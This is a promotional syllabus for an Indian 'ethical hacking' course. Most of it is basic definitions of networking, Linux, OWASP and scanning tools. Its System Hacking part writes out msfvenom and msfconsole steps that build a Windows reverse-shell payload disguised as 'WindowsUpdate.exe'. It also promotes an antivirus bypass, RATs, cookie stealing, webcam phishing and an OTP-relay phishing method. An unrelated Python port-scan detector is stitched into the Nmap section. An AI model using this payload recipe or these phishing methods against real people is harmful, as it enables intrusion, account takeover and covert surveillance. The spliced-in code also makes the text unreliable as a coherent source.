Drop Certified Security Course PDF

Uploaded by Arpan Chotiya

DROP CERTIFIED SECURITY COURSE

www.drop.org.in
COURSE FEATURES
4 Months Live Classes
Premium Software Support
ISO Certified Certificate (Hardcopy)
Internship as per eligibility
JOB OPPORTUNITIES
Cybersecurity Analyst
Information Security Manager
Penetration Tester
Digital Forensics Investigator
Cybersecurity Consultant
Network Security Engineer
Cloud Security Engineer
Visit Us :- Drop.org.in
Call Us :- +91 8918100300
HOW TO PREPARE FOR THIS FIELD?
Education and Certifications: Bachelor's Degree, Certifications
Technical Skills: Programming, Networking, Operating Systems, Security Tools
Hands-On Experience: Internships, Personal Projects, Hackathons
Stay Updated: Continuous Learning, Networking
Develop Soft Skills: Problem-Solving, Communication, Ethical Considerations
SUPPORT TEAM
Dear Hacker,
If you require any type of support in the field of hacking, give us a small chance to help you.
Reply within 24 hours.
E-mail :- [email protected]
Whatsapp Number :- +917384410454 (Whatsapp Only)
CONTACT US
+91 8918100300

www.drop.org.in

[email protected]

Electric Office, Ukhra, Durgapur, West Bengal 713363

Our Social Media :-


TOPICS WE COVERED
Introduction to Ethical Hacking
Fundamentals of Ethical Hacking
Starting Out In Cyber Sec
Networking
Introductory Networking
OSI Model, CIA Model, Network
Hardware Hacking Tools
Surface Web, Deep Web and Dark Web
Web Fundamentals
Network Security
Fundamentals of Linux
Foot printing and Information Gathering
Scanning Networks
System Hacking
Android Device Hacking

Hundreds of satisfied learners are already reaching new heights and earning much more than they expected. If you are willing to kickstart your career in the field of cyber security, you are in the right place!

TOPICS WE COVERED
Linux VPS Installation on Windows & Android
Hacking Wireless Networks
Image Forensics Analysis
Vulnerability Analysis
POC | Proof of Concept | Piece of Code
WEB PENETRATION Testing
Server-Side Request Forgery
Business logic Vulnerabilities
Cross Site Scripting (XSS)
Insecure Direct Object Reference (IDOR)
(FPD) Full Path Disclosure
FTP Exploit Reverse Shell
VPN (Virtual Private Network)
Anonymous Identity
Web RTC Real-Time Communication
Identity System
Location Tracking

We Are The Right Place To Start Your Career In the Field of Cyber Security / Ethical Hacking
INTRODUCTION TO ETHICAL HACKING

Linux OS
Linux is a family of open-source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991, by Linus Torvalds. Linux is typically packaged in a Linux distribution.

Networking
Networking is the exchange of information and ideas among people with a common profession or special interest, usually in an informal social setting.

Types of Hackers
Ethical hacking tutorial, hackers, introduction, hacking, types of hackers, famous hackers, environmental setup, network penetration testing ...

Ethical Hacking
A white hat is an ethical computer hacker, or a computer security expert, who specializes in penetration testing and other testing methodologies that ensure the security of an organization's information systems.

What is Ethical Hacking
Ethical hackers use their knowledge to secure and improve the technology of organizations. They provide an essential service to these organizations by looking for vulnerabilities that can lead to a security breach.

What is Bug Bounty
A bug bounty program is a deal offered by many websites, organizations and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities.

Black Hat Hacker
A black hat hacker is a hacker who violates computer security for their own personal profit or out of malice.
FUNDAMENTALS OF ETHICAL HACKING

Information Gathering
Information gathering is the act of gathering different kinds of information against the targeted victim or system.

Networking
A computer network is a group of computers that use a set of common communication protocols over digital interconnections for the purpose of sharing resources located on or provided by the network nodes.

Gaining Access
The goal here is to collect enough information to gain access to the target.

Scanning
Scanning is reading a text quickly in order to find specific information, e.g. figures or names. It can be contrasted with skimming, which is reading quickly to get a general idea of meaning.

Vulnerability
Vulnerability refers to the inability to withstand the effects of a hostile environment. A window of vulnerability is a time frame within which defensive measures are diminished, compromised or lacking.

Exploitation
Exploitation is a piece of programmed software or script which can allow hackers to take control over a system, exploiting its vulnerability.
STARTING OUT IN CYBER SEC
If you already have a basic idea on the different career tracks in the Industry, search the Hacktivities page for different
walkthroughs and challenges. If you want some more structured learning, check out our learning paths.

Offensive Security
The first large area within Cyber
Security is the offensive side. This area
involves attacking different
applications and technologies to
discover vulnerabilities.

Defensive Security
This is the second major area within
Security. While Offensive Security
involves actively finding vulnerabilities
and misconfigurations within
technologies, Defensive Security involves
detecting and stopping these attacks.
NETWORKING
Begin learning the fundamentals of computer networking in this bite-sized and interactive module.

Identifying Devices on a Network
Now we can change our name through deed poll, but we can't, however, change our fingerprints. Every human has an individual set of fingerprints which means that even if they change their name, there is still an identity behind it. Devices have the same thing: two means of identification, with one being permeable.

Ping (ICMP)
Ping is one of the most fundamental network tools available to us. Ping uses ICMP (Internet Control Message Protocol) packets to determine the performance of a connection between devices, for example, if the connection exists or is reliable.

What is Networking?
A computer network is a set of computers sharing resources located on or provided by network nodes. The computers use common communication protocols over digital interconnections to communicate with each other.

What is the Internet?
The Internet is one giant network that consists of many, many small networks within itself. Using our example from the previous task, let's now imagine that Alice made some new friends named Zayn and Toby that she wants to introduce to Bob and Jim. The problem is that Alice is the only person who speaks the same language as Zayn a..
NETWORKING

Internet Protocol version 4 | IPv4
Internet Protocol version 4 is the fourth version of the Internet Protocol. It is one of the core protocols of standards-based internetworking methods in the Internet and other packet-switched networks. IPv4 was the first version deployed for production on SATNET in 1982 and on the ARPANET in January 1983.

IP Addresses
Briefly, an IP address (or Internet Protocol address) can be used as a way of identifying a host on a network for a period of time, where that IP address can then be associated with another device without the IP address changing. First, let's split up precisely what an IP address is in the diagram below:

Internet Protocol version 6 | IPv6
Internet Protocol version 6 is the most recent version of the Internet Protocol, the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet.

NAT: Network Address Translation
Network address translation is a method of mapping an IP address space into another by modifying network address information in the IP header of packets while they are in transit across a traffic routing device.

MAC Addresses
A media access control address is a unique identifier assigned to a network interface controller for use as a network address in communications within a network segment. This use is common in most IEEE 802 networking technologies, including Ethernet, Wi-Fi, and Bluetooth.
PORTS IN COMPUTER
Total Number of Ports in Networking: 65535

In computer networking, a port is a communication endpoint. At the software level, within an operating system, a port is a logical construct that identifies a specific process or a type of network service. A port is identified for each transport protocol and address combination by a 16-bit unsigned number, known as the port number. The most common transport protocols that use port numbers are the Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP).
INTRODUCTORY NETWORKING
At this stage, hopefully all of the theory has made sense and you now understand the basic models behind computer networking.

Ping | Packet InterNet Groper

Traceroute
The logical follow-up to the ping command is 'traceroute'. Traceroute can be used to map the path your request takes as it heads to the target machine.

The OSI Model
The OSI (Open Systems Interconnection) Model is a standardized model which we use to demonstrate the theory behind computer networking. In practice, it's actually the more compact TCP/IP model that real-world networking is based off; however the OSI model, in many ways, is easier to get an initial understanding from.

WHOIS
WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information.

The TCP/IP Model
The TCP/IP model is, in many ways, very similar to the OSI model. It's a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI Model.

CIA Model | Information Security
Confidentiality, integrity and availability, also known as the CIA triad, is a model designed to guide policies for information security within an organization. The model is also sometimes referred to as the AIC triad (availability, integrity and confidentiality) to avoid confusion.
OPEN SYSTEMS INTERCONNECTION (OSI) MODEL
[Diagram: OSI Layers with Example Protocols; Media Layers]

Application Layer
The application layer of the OSI model essentially provides networking options to programs running on a computer.

Presentation Layer
The presentation layer receives data from the application layer.

Session Layer
When the session layer receives the correctly formatted data from the presentation layer, it looks to see if it can set up a connection with the other computer across the network.

Transport Layer
The transport layer is a very interesting layer that serves numerous important functions. Its first purpose is to choose the protocol over which the data is to be transmitted.

Network Layer
The network layer is responsible for locating the destination of your request. For example, the Internet is a huge network; when you want to request information from a webpage,

Data Link Layer
The data link layer focuses on the physical addressing of the transmission.

Physical Layer
The physical layer is right down to the hardware of the computer. This is where the electrical pulses that make up data transfer over a network are sent and received.
CIA MODEL | INFORMATION SECURITY
The Common Information Model is an open standard that defines how managed elements in an IT environment are represented as a common set of objects and relationships between them.
[Diagram: Information Security triad with Confidentiality, Integrity and Availability]
HARDWARE HACKING TOOL

Wi-Fi Pineapple
The Wi-Fi Pineapple is a portable device used by security professionals to test and analyze wireless networks. It can mimic legitimate Wi-Fi access points to intercept and assess network traffic, helping identify vulnerabilities and improve security.

RTL-SDR
The RTL-SDR (Software Defined Radio) is a versatile and affordable radio receiver that uses the RTL2832U chipset. It enables users to tune into a wide range of radio frequencies and decode various types of signals, such as AM, FM, and digital communications. With software-based processing, it allows for experimentation and exploration of radio frequencies beyond traditional broadcasting, making it popular among hobbyists and researchers.

IMSI Catcher
An IMSI catcher is a device used to intercept mobile phone communications by mimicking a legitimate cell tower. It captures the International Mobile Subscriber Identity (IMSI) of nearby phones, allowing the operator to monitor calls, texts, and sometimes even track the location of the devices. While IMSI catchers can be used for legitimate purposes by law enforcement and security agencies, they are also a potential privacy threat if misused.

NodeMCU ESP8266
The NodeMCU ESP8266 is a compact, low-cost development board featuring the ESP8266 Wi-Fi module. It allows for easy creation of IoT projects by providing built-in Wi-Fi connectivity and a simple programming environment based on Lua or the Arduino IDE. Its versatility and affordability make it popular for prototyping and building connected devices.

Wi-Fi Alfa
The Wi-Fi Alfa refers to a series of high-performance USB Wi-Fi adapters made by Alfa Network. Known for their robust build and strong signal reception, these adapters are commonly used for network security testing, including penetration testing and Wi-Fi monitoring. They often support features like packet injection and monitor mode, which are crucial for conducting comprehensive wireless network assessments.

Keylogger
A keylogger is a type of software or hardware tool designed to record keystrokes made on a keyboard. It captures every key pressed and can track everything from typed text to passwords and other sensitive information. Keyloggers are often used for monitoring and security purposes but can also be exploited for malicious activities like stealing personal data or credentials.
Introduction and objectives
We'll cover HTTP requests and responses, web servers, cookies and then put them all to use in a mini Capture the Flag at the end.

Finding the server
Initially, a DNS request is made. DNS is like a giant phone book that takes a URL (like https://tryhackme.com/) and turns it into an IP address. This means that people don’t have to remember IP addresses for their favourite websites.

Requests
There are 9 different HTTP "verbs", also known as methods. Each one has a different function. We've mentioned GET requests already, these are used to retrieve content. POST: POST requests are used to send data to a web server, like adding a comment or performing a login.

Responses
The server should reply with a response. The response follows a similar structure to the request, but the first line describes the status rather than a verb and a path. The status will normally be a code, you're probably already familiar with 404: Not found.

Cookies
Cookies are small bits of data that are stored in your browser. Each browser will store them separately, so cookies in Chrome won't be available in Firefox. They have a huge number of uses, but the most common are either session management or advertising (tracking cookies). Cookies are normally sent with every HTTP request made to a server.

https://tryhackme.com/r/room/webfundamentals
SURFACE WEB, DEEP WEB AND DARK WEB
The Surface Web
is what users access in their regular day-to-day
activity. It is available to the general public using
standard search engines and can be accessed using
standard web browsers that do not require any special
configuration, such as Mozilla Firefox, Microsoft’s
Internet Explorer or Edge, and Google Chrome.
The Deep Web

The Dark Web


is a less accessible subset of the Deep Web that relies on connections
made between trusted peers and requires specialized software, tools,
or equipment to access. Two popular tools for this are Tor and I2P.
These tools are commonly known for providing user anonymity. Once
logged into Tor or I2P the most direct way to find pages on the Dark
Web is to receive a link to the page from someone who already knows
about the page. The Dark Web is well known due to media reporting
on illicit activity that occurs there.
VPN (VIRTUAL PRIVATE NETWORK)
A VPN stands for “virtual private network.” It’s a digital tool that redirects your internet traffic through a secure tunnel, hiding your IP address and encrypting your data in the process. It’s how a VPN keeps your data private and protects you from potential cyberattacks.

How does it work? When you connect to a VPN service, it authenticates your client with a VPN server and applies an encryption protocol to all your internet data. The VPN service then creates an encrypted “tunnel” over the internet. That secures the data traveling between you and your destination.

What should a good VPN do?
Encryption of your IP address
Encryption of protocols
Two-factor authentication
[Chart: Safe / Anonymous]
INTRUSION DETECTION SYSTEM (IDS)
[Diagram: Firewall, Honeypots and Intrusion Prevention System (IPS) between LAN and WAN]

Intrusion Detection System (IDS)
An intrusion detection system is a passive monitoring solution for detecting cybersecurity threats to an organization. If a potential intrusion is detected, the IDS generates an alert that notifies security personnel to investigate the incident and take remediative action.

Firewall
In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. A firewall typically establishes a barrier between a trusted network and an untrusted network, such as the Internet.

Intrusion Prevention System (IPS)
An intrusion prevention system (IPS) is an active protection system. Like the IDS, it attempts to identify potential threats based upon monitoring features of a protected host or network and can use signature, anomaly, or hybrid detection methods.

Honeypots
In computer terminology, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems.
HONEYPOTS SETUP
[Diagram: Network Security, Detection, Hacking Attack]
In computer terminology, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems.

Pentbox 1.8 | Github
FUNDAMENTALS OF LINUX

Open Source OS
Linux is a family of open-source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991, by Linus Torvalds. Linux is typically packaged in a Linux distribution.

Hacker’s Linux / Penetration Testing OS:
Kali Linux
Parrot Security
Backbox Linux
LINUX INSTALLATION & SETUP IN WINDOWS
Installing Linux on VirtualBox is a common way to run a Linux operating system on your Windows, MacOS, or Linux host machine. VirtualBox is a free and open-source virtualization software that allows you to create virtual machines (VMs) and run various operating systems within them. Here's a step-by-step guide on how to install Linux on VirtualBox.
GOOGLE CLOUD LINUX VPS FOR ANDROID
Google Cloud offers a wide range of virtual private server (VPS) solutions, with the Linux operating system as one of the available options. Google Cloud provides a flexible and scalable infrastructure for hosting Linux-based virtual servers, commonly referred to as Google Compute Engine instances. Here's an overview of how you can set up a Linux-based VPS on Google Cloud.
FOOT PRINTING AND INFORMATION GATHERING
There are two types of footprinting that can be used: active footprinting and passive footprinting. Active footprinting is the process of using tools and techniques, such as performing a ping sweep or using the traceroute command, to gather information on a target.

Active Footprinting
Active footprinting means to perform footprinting by getting in direct touch with the target machine.

Passive Footprinting
Passive footprinting means collecting information of a system located at a remote distance from the attacker.
FOOT PRINTING AND INFORMATION GATHERING

Whois Lookup
WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information.

Wappalyzer
Identify web technologies: Wappalyzer is a technology profiler that shows you what websites are built with. Find out what CMS a website is using, as well as any framework, ecommerce platform, JavaScript libraries and many more.

ARP Protocol
The Address Resolution Protocol is a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given internet layer address, typically an IPv4 address. This mapping is a critical function in the Internet protocol suite.

Eavesdropping
Eavesdropping is the act of secretly or stealthily listening to the private conversation or communications of others without their consent in order to gather information.

Wayback Machine
The Wayback Machine is a digital archive of the World Wide Web, founded by the Internet Archive, a nonprofit library based in San Francisco. It allows the user to go “back in time” and see what websites looked like in the past.

Shodan
Shodan is a search engine that lets the user find specific types of computers connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.
FOOT PRINTING AND INFORMATION GATHERING

Subdomain Enumeration
Subdomain enumeration is the process of finding valid (resolvable) subdomains for one or more domain(s). Unless the DNS server exposes a full DNS zone (via AXFR), it is really hard to obtain a list of existing subdomains. The common practice is to use a dictionary of common names, trying to resolve them.

Tracert
In computing, traceroute and tracert are computer network diagnostic commands for displaying possible routes and measuring transit delays of packets across an Internet Protocol network.

CMS Enumeration
CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

Mirroring Websites

Google Dork
Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using.

Email Tracking
An email tracking service tracks the email you sent. It sends you a notification when the email gets opened, so you can find out when & where recipients read your emails.
GOOGLE DORK
intitle: which finds strings in the title of a page
allintext: which finds all terms in the title of a page
inurl: which finds strings in the URL of a page
site: which restricts a search to a particular site or domain
info: which displays summary information about a page
filetype: which finds specific types of files (doc, pdf, mp3 etc)
link: which searches for all links to a site or URL
cache: which displays Google’s cached copy of a page

Exploit-DB
IMAGE FORENSICS ANALYSIS

Digital Forensic Image Analysis
Digital forensic imaging is defined as the processes and tools used in copying a physical storage device for conducting investigations and gathering evidence. ... The image is an identical copy of all the drive structures and contents.
SCANNING NETWORKS
Network scanning helps to detect all the active hosts on a network and maps them to their IP addresses. Network scanners send a packet or ping to every possible IP address and wait for a response to determine the status of the applications or devices (hosts).

Types of Network Scanning

Port scanning
A port scanner is an application designed to probe a server or host for open ports. Such an application may be used by administrators to verify security policies of their networks and by attackers to identify network services running on a host and exploit vulnerabilities.

Network scanning
Network scanning refers to the use of a computer network to gather information regarding computing systems. Network scanning is mainly used for security assessment, system maintenance, and also for performing attacks by hackers. ... Recognize filtering systems between the user and the targeted hosts.

Nmap Scanner
Nmap is a free and open-source network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.
NMAP: THE NETWORK MAPPER SECURITY SCANNER
Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.
Open-source Network Scanner Created by Gordon Lyon

Nmap Ports Scanning
A port scanner is an application designed to probe a server or host for open ports. Such an application may be used by administrators to verify security policies of their networks and by attackers to identify network services running on a host and exploit vulnerabilities.
nmap -p- drop.org.in

Nmap Aggressive Scanning
Nmap has an aggressive mode that enables OS detection, version detection, script scanning, and traceroute. You can use the -A argument to perform an aggressive scan.
nmap -A drop.org.in

Nmap Version Scanning
Detecting Service and Application Versions: by default, Nmap identifies open ports on the target host and correlates those port numbers with common services associated with those ports.
nmap -sV drop.org.in

Nmap OS Scanning
OS scanning is one of the most powerful features of Nmap. It gives information on the OS (and version) of a host.
nmap -O drop.org.in

Nmap Firewall bypass
nmap -Pn drop.org.in

Nmap Timing Template to level 5
While the fine-grained timing controls discussed in the previous section are powerful and effective, some people find them confusing.
nmap -T5 drop.org.in
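A defender's-side counterpart to the port-scanning commands above, added here as an example (it is not part of the course material): a small Python detector that reads constructed firewall log lines in an assumed, simplified iptables-style format and raises the kind of alert the IDS section earlier on this page describes when one source probes many distinct ports on a host within a short window, which is how a "nmap -p-" style scan looks from the target's side.

```python
"""Port-scan detector over firewall log lines.

Added example, not part of the course material. It assumes a simplified
iptables-style log format (constructed for this example):
    "<epoch seconds> SRC=<ip> DST=<ip> PROTO=<TCP|UDP> DPT=<port> [<flags>]"
and alerts when one source touches many distinct destination ports on one
host inside a sliding time window.
"""
import re
from collections import defaultdict, deque

LINE_RE = re.compile(
    r"^(?P<ts>\d+) SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
    r"PROTO=(?P<proto>[A-Z]+) DPT=(?P<dpt>\d+)(?: (?P<flags>\S+))?$"
)


def parse_line(line):
    """Parse one log line into a dict; return None for lines that do not
    match the assumed format or that carry an impossible port number."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    dpt = int(m.group("dpt"))
    if not 1 <= dpt <= 65535:          # 16-bit port numbers, as the page notes
        return None
    return {
        "ts": int(m.group("ts")),
        "src": m.group("src"),
        "dst": m.group("dst"),
        "proto": m.group("proto"),
        "dpt": dpt,
        "flags": m.group("flags") or "",
    }


class ScanDetector:
    """Sliding-window detector: one alert per (src, dst) pair once the source
    has probed more than `max_ports` distinct destination ports within
    `window` seconds. Events older than the window are evicted, so slow,
    ordinary traffic to a handful of ports never accumulates into an alert."""

    def __init__(self, window=10, max_ports=15):
        self.window = window
        self.max_ports = max_ports
        self._events = defaultdict(deque)   # (src, dst) -> deque[(ts, dpt)]
        self._alerted = set()

    def feed(self, rec):
        key = (rec["src"], rec["dst"])
        q = self._events[key]
        q.append((rec["ts"], rec["dpt"]))
        while q and rec["ts"] - q[0][0] > self.window:
            q.popleft()                      # drop events outside the window
        distinct = {dpt for _, dpt in q}
        if len(distinct) > self.max_ports and key not in self._alerted:
            self._alerted.add(key)
            return {
                "src": rec["src"],
                "dst": rec["dst"],
                "distinct_ports": len(distinct),
                "first_ts": q[0][0],
                "last_ts": rec["ts"],
            }
        return None


def detect_scans(lines, window=10, max_ports=15):
    """Run the detector over an iterable of log lines. Only TCP lines are
    counted; UDP and unparsable lines are skipped. Returns the alerts."""
    det = ScanDetector(window, max_ports)
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP":
            continue
        alert = det.feed(rec)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample log: 10.0.0.5 sweeps ports 20-39 on 10.0.0.10 within
# four seconds, while 10.0.0.7 makes ordinary connections to 443 and 80.
SAMPLE_LOG = [
    f"{1700000000 + i // 5} SRC=10.0.0.5 DST=10.0.0.10 PROTO=TCP DPT={20 + i} SYN"
    for i in range(20)
] + [
    "1700000001 SRC=10.0.0.7 DST=10.0.0.10 PROTO=TCP DPT=443 SYN",
    "1700000002 SRC=10.0.0.7 DST=10.0.0.10 PROTO=TCP DPT=80 SYN",
    "1700000003 SRC=10.0.0.7 DST=10.0.0.10 PROTO=UDP DPT=53",
    "not a firewall line",
]

if __name__ == "__main__":
    for a in detect_scans(SAMPLE_LOG):
        print(f"ALERT: {a['src']} probed {a['distinct_ports']} ports on "
              f"{a['dst']} between {a['first_ts']} and {a['last_ts']}")
```

The threshold and window are deliberately tunable: a full-range scan trips the alert within its first few seconds, while a source that touches the same 20 ports spread over minutes does not.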
NMAP: THE NETWORK MAPPER SECURITY SCANNER

http-enum
Enumerates directories used by popular web applications and servers.
nmap -p 80 --script http-enum.nse

dns-brute
Attempts to enumerate DNS hostnames by brute force guessing of common subdomains. With the dns-brute.srv argument, dns-brute will also try to enumerate common DNS SRV records.
nmap --script dns-brute

http-csrf
Cross-Site Request Forgery (CSRF) vulnerabilities are detected by this script.
nmap -sV --script http-csrf

NSE Libraries
https://nmap.org/nsedoc/lib/

Finding Vulnerable PHP versions
nmap -sV --script=http-phpversion

vuln
Nmap script vuln is the one we’ll be using to launch our next scan against vulnerable subdomains. The syntax is the same as that of the previous NSE scripts, with 'vuln' added after '--script', as you can see here:
nmap -Pn --script vuln

http-sql-injection
It then proceeds to combine crafted SQL commands with susceptible URLs in order to obtain errors. The errors are analysed to see if the URL is vulnerable to attack.
nmap -sV --script http-sql-injection
TRAINING FOR HACKER’S PENDRIVE
For better performance, students need all types of cyber security & ethical hacking software. Get a pendrive with 125+ premium software & tools free with the DCSC course, so that you can learn ethical hacking easily.
SYSTEM HACKING

Windows Defender Bypass
Microsoft Defender Antivirus is an antimalware component of Microsoft Windows. It was first released as a downloadable free anti-spyware program for Windows XP, and was later shipped with Windows Vista and Windows 7.

Windows Remote Hacking (RAT)
The Remote Access Trojan (RAT) can almost be considered the “legacy” tool of hackers. The RAT is a malware program that uses a back door for administrative control over the targeted computer.

MSFVenom
MSFvenom is a penetration testing tool that can be used to generate malicious code, or payloads, for a variety of platforms. It is a combination of two older tools, msfpayload and msfencode, and it offers a number of advantages over its predecessors.

File Extension Spoofer
More advanced users know that to run an exe in Windows it's necessary to use the file extension “.exe”. If a malware developer wanted to distribute a file that was still executable but looked like a pdf it would still have to be called something
SYSTEM HACKING
Windows Defender Bypass
Windows Remote Hacking (RAT)
MSFVenom
File Extension Spoofer
Silent Exploit

Silent Exploit
There are multiple Exploit DOC in Silent DOC Exploit, a package commonly used by web services to process Exploit DOC File. One of the vulnerabilities can lead to remote code execution (RCE) if..
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp --platform
windows -a x86 -f exe LHOST=192.168.13.149 LPORT=4444 -o
~/Desktop/WindowsUpdate.exe

Exploit
➢ msfconsole
➢ use multi/handler
➢ use 5
➢ set payload windows/meterpreter/reverse_tcp
➢ set LHOST 192.168.13.149
➢ set LPORT 4444
➢ exploit

MSFVenom
MSFvenom is a penetration testing tool that can be used to generate malicious code, or
payloads, for a variety of platforms. It is a combination of two older tools, msfpayload
and msfencode, and it offers a number of advantages over its predecessors.

One of the biggest advantages of MSFvenom is that it is a single tool that can be used to
generate payloads for a wide range of platforms. This makes it much easier for
penetration testers to have the right tools at their disposal, and it also reduces the risk
of making mistakes.
SYSTEM HACKING
Bypass Windows Login Password
Cookie Stealing Attack
USB To System Hacking
CamPhish
AdvPhishing

Bypass Windows Login Password
Reset Administrator & User Passwords on Any Windows without Reformatting or Reinstalling System. 100% Success Rate!

Cookie Stealing Attack
Cookie stealing attacks are a type of cyberattack that involves stealing a user's cookies, which are small files that websites use to identify and track users. Cookies can contain sensitive information, such as a user's login credentials, which can be used to gain unauthorized access to a user's account.

USB To System Hacking
Hackers hack system data using a USB device.

CamPhish
CamPhish is a technique to take camera shots of a target's phone front camera or PC webcam. CamPhish hosts a fake website on a built-in PHP server and uses ngrok & serveo to generate a link which we ..

AdvPhishing
When the victim enters his credentials, you need to go to the original website and use those credentials to send a real OTP to the victim. Once he enters that OTP, such OTP will also be there ..
ANDROID HACKING
Remote Access Trojan
The Remote Access Trojan (RAT) can
almost be considered the "legacy" tool
of hackers. The RAT is a malware
program that uses a back door for
administrative control over the
targeted computer.
Spynote black edition 7.0
HACKING WIRELESS NETWORKS
What Is WPS
Wi-Fi Protected Setup (WPS) is a feature supplied with many routers. It is designed to make the process of connecting to a secure wireless network from a computer or other device easier.

WIFI Hacking
WIFI Hacking Using WPS Security is something you can use to find out if your access point is vulnerable to the WPS protocol. As usual, the application lets you carry out this check on any network, but it's recommended to use it exclusively on your own.

WIFI NETCUT | Network Hacking
Netcut, invented by arcai.com, is a tool that protects and manages your private network. This tool works by tracking and manipulating the MAC Addresses that are connected to the network.

WIFI Jamming | WIFI DOS
Jamming is the blocking of or interference with wireless communications. In some cases jammers work by the transmission of radio signals that disrupt communications by decreasing the signal-to-noise ratio. The concept can be used in wireless data networks to disrupt information flow.

WiFi Hacking | WIFI Phishing
Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.
VULNERABILITY ANALYSIS
WpScan
Nikto Web Server Scanner
Nmap Security Scanner
Vega Vulnerability Scanner
Acunetix Web Vulnerability Scanner
OWASP Zed Scanner
Burp Suite Scanner

WpScan
WPScan is an open source WordPress security scanner. You can use it to scan your WordPress website.

Nikto Web Server Scanner
Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received.

Nmap Security Scanner
Nmap is a free and open-source network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.

Vega Vulnerability Scanner
Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Acunetix Web Vulnerability Scanner
Acunetix is an application security testing solution for securing your websites, web applications, and APIs.

OWASP Zed Scanner
OWASP ZAP is an open-source web application security scanner. It is intended to be used by both those new to application security as well as professional penetration testers. It is one of the most active Open Web Application Security Project projects and has been given Flagship status.

Burp Suite Scanner
Burp Scanner automates the task of scanning web sites for content and vulnerabilities.
WEBSITE HACKING
Cross-Site Scripting (XSS)
Cross-site scripting is a type of security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Cross site request forgery (CSRF)
Cross site request forgery (CSRF), also known as XSRF, Sea Surf or Session Riding, is an attack vector that tricks a web browser into executing an unwanted action in an application to which a user is logged in. A successful CSRF attack can be devastating for both the business and user.

Command Injection
Command injection is a cyber attack that involves executing arbitrary commands on a host operating system (OS). Typically, the threat actor injects the commands by exploiting an application vulnerability, such as insufficient input validation.

SQL Injection
SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.

Server-side request forgery (SSRF)
In this section, we'll explain what server-side request forgery is, describe some common examples, and explain how to find and exploit various kinds of SSRF vulnerabilities.

Clickjacking
Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages.

Brute Force
In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found.
WEB PENETRATION TESTING
1. Firewall
In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. A firewall typically establishes a barrier between a trusted network and an untrusted network, such as the Internet.

2. Use HTTPS
As a consumer, you may already know to always look for the green lock image and https in your browser bar any time you provide sensitive information to a website.

3. Up-To-Date
Using a CMS with various useful plugins and extensions offers a lot of benefits, but it also brings risk. The leading cause of website infections is vulnerabilities in a content management system’s extensible components.

4. Don’t help the hackers
Look out for phishing emails and other scams.
OWASP TOP TEN
The OWASP (Open Web Application Security Project) Top Ten is a list of the most critical security risks to web applications. It's essential for developers and security professionals to understand these risks and how to mitigate them to build secure web applications. Here's a brief tutorial covering each of the OWASP Top Ten:

Broken Access Control
moves up from the fifth position; 94% of applications were tested for some form of broken access control. The 34 Common Weakness Enumerations (CWEs) mapped to Broken Access Control had more occurrences in applications than any other category.

Cryptographic Failures
shifts up one position to #2, previously known as Sensitive Data Exposure, which was a broad symptom rather than a root cause. The renewed focus here is on failures related to cryptography which often leads to sensitive data exposure or system compromise.

Injection
slides down to the third position. 94% of the applications were tested for some form of injection, and the 33 CWEs mapped into this category have the second most occurrences in applications. Cross-site Scripting is now part of this category in this edition.

Insecure Design
is a new category for 2021, with a focus on risks related to design flaws. If we genuinely want to “move left” as an industry, it calls for more use of threat modeling, secure design patterns and principles, and reference architectures.

Security Misconfiguration
moves up from #6 in the previous edition; 90% of applications were tested for some form of misconfiguration. With more shifts into highly configurable software, it’s not surprising to see this category move up. The former category for XML External Entities (XXE) is now part of this category.

Vulnerable and Outdated Components
